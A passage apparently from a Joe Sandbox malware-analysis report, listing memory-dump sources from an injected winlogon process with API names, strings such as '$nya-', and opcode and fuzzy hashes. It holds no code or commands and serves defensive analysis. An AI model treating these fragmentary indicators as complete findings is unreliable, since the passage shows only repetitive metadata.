                                                  • Source File: 0000000F.00000002.3350459570.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                  • Associated: 0000000F.00000002.3349704091.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3351334888.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3352170833.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3352963856.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3353741849.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d1e0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                  • String ID: CONOUT$
                                                  • API String ID: 3230265001-3130406586
                                                  • Opcode ID: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
                                                  • Instruction ID: 05e9dde98ab0eb027feff401db16e6f2a0fc78696a85aafa316188426943b24b
                                                  • Opcode Fuzzy Hash: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
                                                  • Instruction Fuzzy Hash: AE119332B50B4482F7528B52E854B9976A0FB88BE8F844214EE5E87B94DF3AC50487C6
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3360858425.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true
                                                  • Associated: 0000000F.00000002.3360109586.000001CA7D290000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3361714879.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3362434977.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3363247667.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3363997537.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d290000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Thread$Current$Context
                                                  • String ID:
                                                  • API String ID: 1666949209-0
                                                  • Opcode ID: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
                                                  • Instruction ID: 3ffafa6e12e7f3b91adaa85c96a8f4b7dc5847d6796292c8cf60de481045626f
                                                  • Opcode Fuzzy Hash: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
                                                  • Instruction Fuzzy Hash: 21D1EC37644B8C81EA71DB0AE49079A77A0FBC8B89F500112EACD577A5DF3DC542CB86
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3355102486.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                                                  • Associated: 0000000F.00000002.3354407705.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3355894210.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3356681840.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3357412344.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3358060672.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d210000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Thread$Current$Context
                                                  • String ID:
                                                  • API String ID: 1666949209-0
                                                  • Opcode ID: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
                                                  • Instruction ID: 813dea70fcca1b133d49793039452a6eb6565c05de3bdde15a2486de481bcc61
                                                  • Opcode Fuzzy Hash: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
                                                  • Instruction Fuzzy Hash: A1D1CA37644B8C81EA71DB0AE49079E77A0F788B89F504116EACD477A4CF3EC542CB86
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3360858425.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true
                                                  • Associated: 0000000F.00000002.3360109586.000001CA7D290000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3361714879.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3362434977.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3363247667.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3363997537.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d290000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Free$CurrentThread
                                                  • String ID:
                                                  • API String ID: 564911740-0
                                                  • Opcode ID: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
                                                  • Instruction ID: 40abc1d1199b5cdc770a56a60e0e5f4e9b8051ed8e0c54cf7d7e0152ccf3fe8e
                                                  • Opcode Fuzzy Hash: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
                                                  • Instruction Fuzzy Hash: 5651A332A81B4995FE07DB24D850AE933A1FF4474DFC40825A56C163A5EF76C52AC3E3
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3355102486.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                                                  • Associated: 0000000F.00000002.3354407705.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3355894210.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3356681840.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3357412344.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3358060672.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d210000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Free$CurrentThread
                                                  • String ID:
                                                  • API String ID: 564911740-0
                                                  • Opcode ID: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
                                                  • Instruction ID: 8074ab1debeccdb7de81f9b6b17c497a6e832b8f613fb371d3e6f8c834ae6948
                                                  • Opcode Fuzzy Hash: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
                                                  • Instruction Fuzzy Hash: 7D51C236A91B4995FA07DB28D851AD833A5FF4474CFC08819A52C063A5EF77C51AC3E3
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3350459570.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                  • Associated: 0000000F.00000002.3349704091.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3351334888.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3352170833.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3352963856.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3353741849.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d1e0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Free$CurrentThread
                                                  • String ID:
                                                  • API String ID: 564911740-0
                                                  • Opcode ID: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
                                                  • Instruction ID: dd7d2fbe355015c765db1afd73c3d8f2591a8a07618d104dc6321a3fb9c50056
                                                  • Opcode Fuzzy Hash: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
                                                  • Instruction Fuzzy Hash: 8751C372A81B4995FB07DB24D860AE433A1BF0474EFC40819A52D467A5FF7AC619C3E3
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3360858425.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true
                                                  • Associated: 0000000F.00000002.3360109586.000001CA7D290000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3361714879.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3362434977.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3363247667.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3363997537.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d290000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$AllocFree
                                                  • String ID: $nya-
                                                  • API String ID: 756756679-1266920357
                                                  • Opcode ID: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
                                                  • Instruction ID: 49d9b1d556f3864c95b1a31ff4b7aec20a143fd073b71ee62d72c1b734a9cc42
                                                  • Opcode Fuzzy Hash: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
                                                  • Instruction Fuzzy Hash: 20319233B45B5996F612DF169540AAA73A0FF84B89F8840208F4857755EF36C4A287C6
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3355102486.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                                                  • Associated: 0000000F.00000002.3354407705.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3355894210.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3356681840.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3357412344.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3358060672.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d210000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$AllocFree
                                                  • String ID: $nya-
                                                  • API String ID: 756756679-1266920357
                                                  • Opcode ID: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
                                                  • Instruction ID: 1920b0173048c2e31b506ed75283f2b7a4db50c395d0afa64895e5cbc0f95bca
                                                  • Opcode Fuzzy Hash: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
                                                  • Instruction Fuzzy Hash: 6131A233B45B9982F612CF169540BA97391BF44B88F888028DF4807755EF3BD4A283C6
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3350459570.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                  • Associated: 0000000F.00000002.3349704091.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3351334888.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3352170833.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3352963856.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3353741849.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d1e0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$AllocFree
                                                  • String ID: $nya-
                                                  • API String ID: 756756679-1266920357
                                                  • Opcode ID: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
                                                  • Instruction ID: 53dd2015d23d3b19de732b4b8ca317527b9a6887f52f6010c9b4161ede9a8080
                                                  • Opcode Fuzzy Hash: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
                                                  • Instruction Fuzzy Hash: 2831A233B41B5982F716DF26D544AA973A0BF48F8AF8840208F4807755EF36C5A18383
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3360858425.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true
                                                  • Associated: 0000000F.00000002.3360109586.000001CA7D290000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3361714879.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3362434977.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3363247667.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3363997537.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d290000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast$Value$FreeHeap
                                                  • String ID:
                                                  • API String ID: 365477584-0
                                                  • Opcode ID: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
                                                  • Instruction ID: 19b92fad8f820dd81a55a9e9a50199315003bb2ffc475f1c6e47e87a83ff1d46
                                                  • Opcode Fuzzy Hash: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
                                                  • Instruction Fuzzy Hash: 2011B233E8434842F64667316505FFE3141BF85799FD84624A86A367DADE2AC40357C3
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3355102486.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                                                  • Associated: 0000000F.00000002.3354407705.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3355894210.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3356681840.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3357412344.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3358060672.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d210000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast$Value$FreeHeap
                                                  • String ID:
                                                  • API String ID: 365477584-0
                                                  • Opcode ID: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
                                                  • Instruction ID: be797efc4d241fe522fb318c8b0c2a52a319cfeeeb0bbc57bc3f76715505c0c3
                                                  • Opcode Fuzzy Hash: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
                                                  • Instruction Fuzzy Hash: 25118237E8435882F616A7316911BFE7241BF847A8FD4C628A926567DACE3BD40353C3
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3350459570.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                  • Associated: 0000000F.00000002.3349704091.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3351334888.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3352170833.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3352963856.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3353741849.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d1e0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast$Value$FreeHeap
                                                  • String ID:
                                                  • API String ID: 365477584-0
                                                  • Opcode ID: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
                                                  • Instruction ID: a72ea2f354f7ddfc3d159c3a9229b8853cee2434eedb132b01efaf94eb9f651b
                                                  • Opcode Fuzzy Hash: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
                                                  • Instruction Fuzzy Hash: 45115433F8134942FA166731A811BEE3153BF8479DFD84624A866563CADE3AD50183C3
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3360858425.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true
                                                  • Associated: 0000000F.00000002.3360109586.000001CA7D290000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3361714879.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3362434977.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3363247667.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3363997537.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d290000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                  • String ID:
                                                  • API String ID: 517849248-0
                                                  • Opcode ID: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
                                                  • Instruction ID: 981376d91bc599ae55fe3b6c15a14bb63b400c610608c7f00c9fc4e34d6b33a7
                                                  • Opcode Fuzzy Hash: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
                                                  • Instruction Fuzzy Hash: F9018B32B40B4486FA11CB12A848B9BB3A1FBC8FC8F8840349E4D47754DE39C986C3C2
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3355102486.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                                                  • Associated: 0000000F.00000002.3354407705.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3355894210.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3356681840.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3357412344.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3358060672.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d210000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                  • String ID:
                                                  • API String ID: 517849248-0
                                                  • Opcode ID: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
                                                  • Instruction ID: 8b86b7224197d8699fc3a6726de84bfb578e7bf873a1a615f1c4c61348878a40
                                                  • Opcode Fuzzy Hash: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
                                                  • Instruction Fuzzy Hash: 7D016132B44B4482F711DB12A854B9973A1FB88FD4F898034AE4D43754DE3EC54AC7D6
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3350459570.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                  • Associated: 0000000F.00000002.3349704091.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3351334888.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3352170833.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3352963856.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3353741849.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d1e0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                  • String ID:
                                                  • API String ID: 517849248-0
                                                  • Opcode ID: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
                                                  • Instruction ID: a292ab2cfa75126c4a735770990b9ca6806856f301d60702c71bca0c6d7b623e
                                                  • Opcode Fuzzy Hash: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
                                                  • Instruction Fuzzy Hash: B9016D32B45B8482FB11DB12E868B9973A1FB88FC8F8940349E5E43754DE3DC685C792
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3360858425.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true
                                                  • Associated: 0000000F.00000002.3360109586.000001CA7D290000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3361714879.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3362434977.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3363247667.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3363997537.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d290000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                  • String ID:
                                                  • API String ID: 449555515-0
                                                  • Opcode ID: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
                                                  • Instruction ID: ae5bcde55931890828b24d78268571c20791c05152b53787220c891cd16456b3
                                                  • Opcode Fuzzy Hash: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
                                                  • Instruction Fuzzy Hash: 20011E76B5174882FB269B21E448B9772A1FF98B49F940024CD5D1A358EF3EC04A87D3
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3355102486.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                                                  • Associated: 0000000F.00000002.3354407705.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3355894210.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3356681840.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3357412344.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3358060672.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d210000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                  • String ID:
                                                  • API String ID: 449555515-0
                                                  • Opcode ID: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
                                                  • Instruction ID: 778107bd0b08783d02a6487691dad5ad8f670edfcd41cc8f228037a5f129dca4
                                                  • Opcode Fuzzy Hash: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
                                                  • Instruction Fuzzy Hash: 13016136B4174882FB269B25E848B9533A4BF48B59F844428D94D06358EF3FC14AC7DB
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3350459570.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                  • Associated: 0000000F.00000002.3349704091.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3351334888.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3352170833.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3352963856.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3353741849.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d1e0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                  • String ID:
                                                  • API String ID: 449555515-0
                                                  • Opcode ID: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
                                                  • Instruction ID: c63064200cc5015cd9426516bf03d8a10638c949921e829e67ac36650152cb9d
                                                  • Opcode Fuzzy Hash: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
                                                  • Instruction Fuzzy Hash: 8C012176B5274882FB269B61E458F9573B0FF44B4AF840024D94D46358EF3EC549C793
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3360858425.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true
                                                  • Associated: 0000000F.00000002.3360109586.000001CA7D290000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3361714879.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3362434977.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3363247667.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3363997537.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d290000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: FinalHandleNamePathlstrlen
                                                  • String ID: \\?\
                                                  • API String ID: 2719912262-4282027825
                                                  • Opcode ID: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
                                                  • Instruction ID: d1ff288a7fe1735c0b389d8a0fb70851f6f610ee87196fd53a68ee1478238ee0
                                                  • Opcode Fuzzy Hash: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
                                                  • Instruction Fuzzy Hash: BAF0A47374478892FB219B21F494B9B7361FBC4B9CFC44021CE4946954DE6DC64AC7D2
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3355102486.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                                                  • Associated: 0000000F.00000002.3354407705.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3355894210.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3356681840.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3357412344.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3358060672.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d210000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: FinalHandleNamePathlstrlen
                                                  • String ID: \\?\
                                                  • API String ID: 2719912262-4282027825
                                                  • Opcode ID: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
